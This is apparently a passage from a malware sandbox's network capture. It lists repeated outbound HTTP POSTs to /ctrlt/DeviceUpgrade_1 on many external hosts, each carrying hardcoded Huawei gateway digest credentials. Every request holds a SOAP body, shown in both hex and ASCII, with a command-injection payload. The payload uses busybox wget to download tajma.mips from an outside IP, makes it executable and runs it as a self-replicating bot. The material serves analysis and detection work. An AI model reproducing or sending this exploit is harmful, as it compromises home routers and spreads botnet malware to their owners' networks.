                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1541192.168.2.2349550197.54.254.19537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546803951 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1542192.168.2.235612441.65.186.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546842098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1543192.168.2.233975241.20.124.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547319889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1544192.168.2.2337612197.48.106.20437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547324896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1545192.168.2.2340258194.171.61.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547324896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1546192.168.2.234818441.193.157.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547378063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1547192.168.2.235703241.36.206.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547379971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1548192.168.2.2349574157.101.135.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.547380924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1549192.168.2.235876641.107.122.14537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548198938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1550192.168.2.2346838197.75.224.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548203945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
